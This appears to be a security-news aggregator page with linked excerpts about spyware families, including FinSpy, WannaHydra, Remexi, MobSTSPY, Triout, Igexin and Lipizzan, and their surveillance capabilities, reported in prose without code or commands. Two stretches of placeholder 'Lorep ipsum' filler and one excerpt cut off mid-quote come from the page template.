New FinSpy iOS and Android implants revealed ITW

By: GReAT ,AMR

FinSpy is spyware made by the German company Gamma Group. Through its UK-based subsidiary Gamma International Gamma Group sells FinSpy to government and law enforcement organizations all over the world. FinSpy is used to collect a variety of private user information on various platforms. Its implants for desktop devices were first described in 2011 by Wikileaks and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. According to our telemetry, several dozen unique mobile devices have been infected over the past year, with recent activity recorded in Myanmar in June 2019. Late in 2018, experts at Kaspersky looked at the functionally latest versions of FinSpy implants for iOS and Android, built in mid-2018. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, SMS/MMS messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers.

Malware features

iOS

FinSpy for iOS is able to monitor almost all device activities, including record VoIP calls via external apps such as Skype or WhatsApp. The targeted applications include secure messengers such as Threema, Signal and Telegram. However, functionality is achieved by leveraging Cydia Substrate’s hooking functionality, so this implant can only be installed on jailbroken devices (iPhone or iPad; iPod has not been confirmed) compatible with iOS 11 and below (newer versions are not confirmed as at the time of the research and implants for iOS 12 has not been observed yet). After the deployment process, the implant provides the attacker with almost unlimited monitoring of the device’s activities.

The analyzed implant contained binary files for two different CPU architectures: ARMv7 and ARM64. Taking into account that iOS 11 is the first iOS version that does not support ARMv7 any more, we presumed that the 64-bit version was made to support iOS 11+ targets.

It looks like FinSpy for iOS does not provide infection exploits for its customers, because it seems to be fine-tuned to clean traces of publicly available jailbreaking tools. Therefore, an attacker using the main infection vector will need physical access in order to jailbreak it. For jailbroken devices, there are at least three possible infection vectors:

  • SMS message
  • Email
  • WAP Push

Any of those can be sent from the FinSpy Agent operator’s terminal.

The installation process involves several steps. First, a shell script checks the OS version and executes the corresponding Mach-O binary: “install64” (64-bit version) is used for iOS 11+, otherwise “install7” (32-bit version) is used. When started, the installer binary performs environmental checks, including a Cydia Subtrate availability check; and if it isn’t available, the installer downloads the required packages from the Cydia repository and installs them using the “dpkg” tool. After that the installer does some path preparations and package unpacking, randomly selects names for the framework and the app from a hardcoded list, deploys components on the target system and sets the necessary permissions. After the deployment process is done, the daemon is started and all temporary installation files are deleted.

More: https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/

WannaHydra | Avast encontra novo malware bancário para dispositivos móveis

By: Natalie Rosa

Uma nova ameaça foi encontrada pela Avast, empresa dedicada a produtos de segurança digital, tendo como alvo os bancos Santander, Itaú e Banco do Brasil, com foco justamente nos correntistas brasileiros.

Batizada de WannaHydra, a ameaça possui várias funções de malware em uma só, como trojan bancário, spyware e ramsomware. Segundo os especialistas, o vírus vem se espalhando por meio de sites maliciosos e lojas de aplicativos de terceiros.

A Avast explica que o WannaHydra emite um alerta falso à vítima indicando que há um problema com sua conta bancária. Com isso, a pessoa acaba fazendo o suposto login em sua conta quando acaba visualizando interfaces iguais às originais dos respectivos bancos. Com as credenciais inseridas, os cibercriminosos têm acesso aos dados da vítima.

Mais: https://canaltech.com.br/hacker/wannahydra-avast-encontra-novo-malware-bancario-para-dispositivos-moveis-143101/

What’s Farsi for ‘as subtle as a nuke through a window’? Foreign diplomats in Iran hit by renewed Remexi nasty Iran, spying on foreigners within its borders? Shocked, shocked, we tell you

By: Shaun Nichols

A newly uncovered spyware-slinging operation appears to have been targeting foreign diplomats in Iran for more than three years.

Researchers at Kaspersky Lab said this week that a new build of the Remexi software nasty, first seen in 2015, has been spotted lurking on multiple machines within Iran, mostly those located within what we assume are foreign embassy buildings. The Windows-targeting surveillance-ware was previously associated with a hacking group known as Chafer, and an examination of the latest strain suggests it is of Iranian origin.

“The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible,” Kaspersky’s Denis Legezo said of the infection.

“The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data.”

Curiously, Legezo said he does not yet know how the malware is spreading in the wild, just that it is targeting “foreign diplomatic entities” based within Iran.

“So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread,” we’re told.

“However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware.”

Once on a victim’s machine, the spyware is very persistent, hiding out in scheduled tasks, Userinit and Run registry keys in the HKLM hive, depending on the version of Windows it has infected. Data is exfiltrated to command and control servers using Microsoft’s bitsadmin.exe transfer utility.

According to timestamps in the malware, its development appears to have been completed in March 2018, though there are a few sections of the code that appear to be much older.

More:  https://www.theregister.co.uk/2019/01/31/iran_embassies_malware/

Hundreds of Thousands Download Spyware from Google Play

By: Ionut Arghire

Hundreds of thousands of users ended up with spyware on their devices after downloading seemingly legitimate applications from Google Play, Trend Micro security researchers have discovered. 

Detected as MobSTSPY, the malware, which can gather various information from the victims, isn’t new. For distribution, its operators chose to masquerade the threat as legitimate Android applications and submit them to Google Play.

Trend Micro discovered a total of six such applications, including FlashLight, HZPermis Pro Arabe, Win7imulator, Win7Launcher, Flappy Bird, and Flappy Birr Dog. Available for download in Google Play in 2018, some of these were downloaded over 100,000 times by users from all over the world.

Once one of these applications has been installed on the victim’s device, the spyware can proceed to stealing information such as SMS conversations, call logs, user location, and clipboard items. The malware sends the collected information to the attacker’s server using Firebase Cloud Messaging.

Upon initial execution, the malware checks the device’s network availability, after which it reads and parses an XML configuration file from its command and control (C&C) server. Next, it collects information such as language used on the device, registered country, package name, manufacturer, etc.

The information is then sent to the C&C server for registration purposes. After this step has been completed, the malware waits for the server to send over commands to execute.

Based on the received commands, the spyware can not only steal SMS messages and call logs, but can also retrieve contact lists and files found on the device.

The malware can also perform a phishing attack to gather credentials from the infected device, the security researchers discovered. It can display fake Facebook and Google pop-ups, thus tricking the user into revealing their account details.

After the user provides the credentials, a fake pop-up informs them the log-in was unsuccessful, but at this point the malware has already stolen the credentials.

“Part of what makes this case interesting is how widely its applications have been

More: https://www.securityweek.com/hundreds-thousands-download-spyware-google-play

Android ‘Triout’ spyware records calls, sends photos and text messages to attackers

By: Ms. Smith

Triout, a creepy Android spyware identified by Bitdefender researchers, can secretly snap photos and videos, record phone calls, log text messages and keep track of victims’ locations. The spyware framework’s extensive surveillance capabilities that can be bundled into benign apps make it likely that it is part of an espionage campaign.

The malicious app contains the same code and functionality as the original app as well as the malicious payload. Perhaps there were a lot of people in Israel looking to spice up their love lives because that is where most the Triout-infected ‘Sex Game’ (SexGameForAdults) apps were detected. The first malware sample, however, was originally submitted to VirusTotal from Russia on May 15, 2018.

Triout was detected by Bitdefender’s machine learning algorithms. Bitdefender researchers suspect the Triout spyware is being hosted on attacker-controlled domains or third-party marketplaces. The firm suspects it is being used for an espionage campaign, but does not know what group or nation is behind it.

The spyware capabilities include:

  • Recording every phone call as a media file and sending it along with the call date, call duration and the caller ID to a C&C server.
  • Logging every incoming text message and sending it to the C&C.
  • Taking photos with the front and rear cameras and sending those to the C&C server; the camera capture was described as “one of the more disturbing features” by Bitdefender.
  • Logging GPS coordinates and sending the tracked data to the C&C.
  • The Android spyware can also hide itself from the user.

Despite all those advanced spying features, the most striking thing about the sample, according to Bitdefender’s whitepaper (pdf), “is that it’s completely unobfuscated, meaning that simply by unpacking the .apk file, full access to the source code becomes available. This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices.” The C&C server, a single, hardcoded IP address, to which the app sends the collected data has been operational since May.

More: https://www-csoonline-com.cdn.ampproject.org/

Over 500 Android Apps On Google Play Store Found Spying On 100 Million Users

By: sikur

By Swati Khandelwal

android-spyware-malwareOver 500 different Android apps that have been downloaded more than 100 million times from the official Google Play Store found to be infected with a malicious ad library that secretly distributes spyware to users and can perform dangerous operations.

Since 90 per cent of Android apps is free to download from Google Play Store, advertising is a key revenue source for app developers. For this, they integrate Android SDK Ads library in their apps, which usually does not affect an app’s core functionality.

But security researchers at mobile security firm Lookout have discovered a software development kit (SDK), dubbed Igexin, that has been found delivering spyware on Android devices.

MORE: http://thehackernews.com/2017/08/android-spyware-malware.html

 

Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist

Google Detects Dangerous Spyware Apps On Android Play Store

By: sikur

By Swati Khandelwal

android-spyware-appSecurity researchers at Google have discovered a new family of deceptive Android spyware that can steal a whole lot of information on users, including text messages, emails, voice calls, photos, location data, and other files, and spy on them.

Dubbed Lipizzan, the Android spyware appears to be developed by Equus Technologies, an Israeli startup that Google referred to as a ‘cyber arms’ seller in a blog post published Wednesday.

With the help of Google Play Protect, the Android security team has found Lipizzan spyware on at least 20 apps in Play Store, which infected fewer than 100 Android smartphones in total.

MORE: http://thehackernews.com/2017/07/lipizzan-android-spyware.html

 

Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist Lorep ipsum Lorep ipsum, journalist